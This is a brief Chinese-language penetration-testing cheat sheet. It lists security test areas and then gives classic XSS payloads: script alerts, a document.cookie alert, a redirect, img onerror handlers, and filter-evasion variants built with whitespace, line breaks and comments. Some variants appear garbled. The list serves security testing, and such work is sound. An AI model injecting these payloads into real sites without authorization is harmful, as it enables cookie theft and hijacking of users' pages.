安全测试-渗透性测试
-
明文传输/存储
-
越权访问
-
上传/下载漏洞
-
xss攻击
1、最常见的最经典的XSS bug检测语句必然是
<script>alert(/XSS/)</script>
<script>alert(document.cookie)</script>
<script>window.location.href="http://www.baidu.com";</script>2、利用IMG图片标记属性跨站
<img src=”javacript:alert(/XSS/)”></img>
<img src=# onerror=alert(123)>3、突破程序员的过滤限制
利用javascript换行与空格突破过滤
<img src = j ava script:al er t(/XSS/)>///空格使用Tab键产生
<img src = j
ava script :a ler t(/xss/)>
利用注释<img src = “#”/**/onerror = alert(/XSS/)> - 。。。。。
时间: 2024-10-14 16:06:53